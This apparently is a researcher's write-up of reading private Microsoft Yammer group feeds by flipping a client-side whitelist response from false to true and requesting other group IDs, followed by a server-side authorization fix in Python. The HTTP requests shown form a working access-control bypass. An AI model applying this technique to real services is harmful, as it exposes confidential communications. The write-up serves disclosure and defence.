Reading Message from Microsoft’s Private Yammer Group

Fig 0x00 — User is not Authorized
GET /api/user/maotg@*.onmicrosoft.com/userwhitelist 
Host: ?*.azurewebsites.net
  • The user is authorized (white-listed) if the response to the above request is true.
  • The user is not authorized if the response to the above request is false.
Fig 0x01 — checking user’s authorization
Fig 0x02 — Original Response — false
Fig 0x03 — Edited response — changing to true
GET /api/Yammer/group/15003/feeds/5 
Host: ?.azurewebsites.net
Authorization: Bearer eyJ…
Figure 0x05 — Fetching top 5 feeds from group 15003
Figure 0x06 — More info top 1000 feed
GET /api/Yammer/group/30300774400/feeds/5000 
Host: ?.azurewebsites.net
Authorization: Bearer eyJ…
Figure 0x07 — Reading feeds from a different group
Fig 0x08 — Sample confidential conversation between Microsoft employees
Figure 0x09 — Another example
GET /api/Yammer/group/16002774/feeds/5000 
Host: ?.azurewebsites.net
Authorization: Bearer eyJ…
Figure 0x10 — Reading message from group 16002774
Fig 0x11 — Confidential information regarding Business Strategy
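
The requests above show a whitelist check whose true/false answer is returned to the client, followed by feed requests addressed by group ID. As an added example (not code from the original post or from the affected application), this sketch enforces both decisions on the server for every feed request; the function names, in-memory stores, users and messages are assumptions constructed for illustration.

```python
# Added illustration: authorization enforced on the server for a feeds route.
# Every name, user and message below is constructed for this sketch.
WHITELIST = {"alice@example.onmicrosoft.com", "bob@example.onmicrosoft.com"}
GROUP_MEMBERS = {
    15003: {"alice@example.onmicrosoft.com"},
    16002774: {"bob@example.onmicrosoft.com"},
}
FEEDS = {15003: ["msg-a", "msg-b", "msg-c"], 16002774: ["msg-x"]}
MAX_FEEDS = 100  # server-side cap on how many items one request may return


def is_whitelisted(user):
    """Same question as the userwhitelist route, answered on the server."""
    return user.lower() in WHITELIST


def get_group_feeds(token_user, group_id, count):
    """Handle GET /api/Yammer/group/<group_id>/feeds/<count>.

    token_user is the identity from an already validated bearer token
    (validation itself is out of scope), or None if validation failed.
    Returns a (status, body) tuple.
    """
    if token_user is None:
        return 401, "missing or invalid token"
    # Re-evaluate the whitelist here; a true/false sent to the client
    # earlier is only a UI hint and can be altered before the client reads it.
    if not is_whitelisted(token_user):
        return 403, "forbidden"
    # Object-level check: the caller must belong to the requested group.
    # Unknown groups get the same answer, so group IDs cannot be probed.
    if token_user.lower() not in GROUP_MEMBERS.get(group_id, set()):
        return 403, "forbidden"
    if count < 1:
        return 400, "count must be positive"
    return 200, FEEDS.get(group_id, [])[:min(count, MAX_FEEDS)]


if __name__ == "__main__":
    cases = [
        ("mallory@example.onmicrosoft.com", 15003, 5),       # not whitelisted
        ("alice@example.onmicrosoft.com", 15003, 5),         # group member
        ("alice@example.onmicrosoft.com", 16002774, 5000),   # other group
        ("bob@example.onmicrosoft.com", 30300774400, 5000),  # unknown group
    ]
    for user, group, count in cases:
        print(user, group, get_group_feeds(user, group, count))
```

With these checks in the handler, changing the whitelist response on the client side has no effect on what the feeds route returns.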
